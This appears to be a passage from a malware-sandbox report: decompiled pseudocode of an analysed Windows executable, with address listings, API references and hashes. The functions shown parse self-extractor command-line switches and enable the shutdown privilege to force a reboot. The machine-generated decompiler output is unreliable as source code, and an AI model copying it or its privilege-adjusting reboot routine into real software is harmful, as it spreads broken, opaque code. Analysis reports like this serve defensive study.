                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EB0123100010CB78F001B42EC08C453F1DD7C13A47100010F50C410218B3B98118585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E000C5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xc8004; // 0x374600bf
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E000C6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E000C6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xc8004; // 0x374600bf
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E000C597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E000C44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xc9124 = E000C6285();
									_t75 = 0;
								}
								return E000C6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E000C44B9(0, 0x521, 0xc1140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0xc8588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E000C667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E000C667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E000C5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E000C1680(0xc8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E000C667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E000C667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xc8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E000C5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xc8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xc8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E000C1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E000C658A(_t218, 0x104, 0xc1140);
                                                                                                                                                                                                        																if(E000C31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xc8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xc8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xc8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xc8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xc8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xc9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xc9a2c =  *0xc9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xc8d48 =  *0xc8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xc9a2c =  *0xc9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xc9a2c =  *0xc9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xc8d48 =  *0xc8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xc9a2c =  *0xc9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xc8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xc9a2c = 3;
                                                                                                                                                                                                        																	 *0xc8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xc8a2c != 0 &&  *0xc8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xc9a3c, 0xc8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E000C66C8(0xc8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x000c6190
                                                                                                                                                                                                        0x000c6196
                                                                                                                                                                                                        0x000c61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c61ab
                                                                                                                                                                                                        0x000c61b9
                                                                                                                                                                                                        0x000c61c6
                                                                                                                                                                                                        0x000c61c6
                                                                                                                                                                                                        0x000c617e
                                                                                                                                                                                                        0x000c6180
                                                                                                                                                                                                        0x000c618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c618a
                                                                                                                                                                                                        0x000c615e
                                                                                                                                                                                                        0x000c6160
                                                                                                                                                                                                        0x000c616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c616a
                                                                                                                                                                                                        0x000c615c
                                                                                                                                                                                                        0x000c614a
                                                                                                                                                                                                        0x000c610b
                                                                                                                                                                                                        0x000c610e
                                                                                                                                                                                                        0x000c610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e59
                                                                                                                                                                                                        0x000c5e59
                                                                                                                                                                                                        0x000c5e5c
                                                                                                                                                                                                        0x000c604f
                                                                                                                                                                                                        0x000c6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c605c
                                                                                                                                                                                                        0x000c606e
                                                                                                                                                                                                        0x000c6071
                                                                                                                                                                                                        0x000c6073
                                                                                                                                                                                                        0x000c6075
                                                                                                                                                                                                        0x000c6075
                                                                                                                                                                                                        0x000c6078
                                                                                                                                                                                                        0x000c6078
                                                                                                                                                                                                        0x000c607a
                                                                                                                                                                                                        0x000c607b
                                                                                                                                                                                                        0x000c6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6087
                                                                                                                                                                                                        0x000c6087
                                                                                                                                                                                                        0x000c608d
                                                                                                                                                                                                        0x000c609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c60a2
                                                                                                                                                                                                        0x000c60aa
                                                                                                                                                                                                        0x000c60b2
                                                                                                                                                                                                        0x000c60b7
                                                                                                                                                                                                        0x000c60bd
                                                                                                                                                                                                        0x000c60bf
                                                                                                                                                                                                        0x000c60bf
                                                                                                                                                                                                        0x000c60d6
                                                                                                                                                                                                        0x000c60e0
                                                                                                                                                                                                        0x000c60e7
                                                                                                                                                                                                        0x000c60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c60f5
                                                                                                                                                                                                        0x000c609c
                                                                                                                                                                                                        0x000c6081
                                                                                                                                                                                                        0x000c5e62
                                                                                                                                                                                                        0x000c5e62
                                                                                                                                                                                                        0x000c5e65
                                                                                                                                                                                                        0x000c5fd3
                                                                                                                                                                                                        0x000c5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fef
                                                                                                                                                                                                        0x000c5fef
                                                                                                                                                                                                        0x000c5ff7
                                                                                                                                                                                                        0x000c5ffd
                                                                                                                                                                                                        0x000c6003
                                                                                                                                                                                                        0x000c6006
                                                                                                                                                                                                        0x000c6011
                                                                                                                                                                                                        0x000c6014
                                                                                                                                                                                                        0x000c603d
                                                                                                                                                                                                        0x000c6016
                                                                                                                                                                                                        0x000c6018
                                                                                                                                                                                                        0x000c6019
                                                                                                                                                                                                        0x000c601b
                                                                                                                                                                                                        0x000c6033
                                                                                                                                                                                                        0x000c601d
                                                                                                                                                                                                        0x000c6020
                                                                                                                                                                                                        0x000c6029
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6022
                                                                                                                                                                                                        0x000c6020
                                                                                                                                                                                                        0x000c601b
                                                                                                                                                                                                        0x000c6042
                                                                                                                                                                                                        0x000c6044
                                                                                                                                                                                                        0x000c6046
                                                                                                                                                                                                        0x000c604a
                                                                                                                                                                                                        0x000c5ff7
                                                                                                                                                                                                        0x000c5fd5
                                                                                                                                                                                                        0x000c5fd8
                                                                                                                                                                                                        0x000c5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5e6b
                                                                                                                                                                                                        0x000c5e6b
                                                                                                                                                                                                        0x000c5e6e
                                                                                                                                                                                                        0x000c5f8b
                                                                                                                                                                                                        0x000c5f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5f9f
                                                                                                                                                                                                        0x000c5fa7
                                                                                                                                                                                                        0x000c5faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb1
                                                                                                                                                                                                        0x000c5fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb5
                                                                                                                                                                                                        0x000c5fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5fb9
                                                                                                                                                                                                        0x000c5fb7
                                                                                                                                                                                                        0x000c5fb3
                                                                                                                                                                                                        0x000c5faf
                                                                                                                                                                                                        0x000c5f8d
                                                                                                                                                                                                        0x000c5f8d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 000C5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(000C8B3E,00000104,00000000,?,?), ref: 000C5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 000C5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 000C5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 000C6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 000C60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000C1140,00000000,00000040,00000000), ref: 000C61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 000C61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 149e513c587ebe1ed93f2859b31c004f6034c020df6e488b8efa4097fe8eb067
                                                                                                                                                                                                        • Instruction ID: fa797a1c72f3d4a414f8ead1dabf8b9809e24c45bf7ffd0ed1273ce78c986b66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 149e513c587ebe1ed93f2859b31c004f6034c020df6e488b8efa4097fe8eb067
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D16B75A04A445FEB798B3C8C48FFE3BE1AB16306F1840ADC486D6191DA75AEC2CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E000C1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xc9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E000C44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E000C6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E000C44B9(0, 0x522, 0xc1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
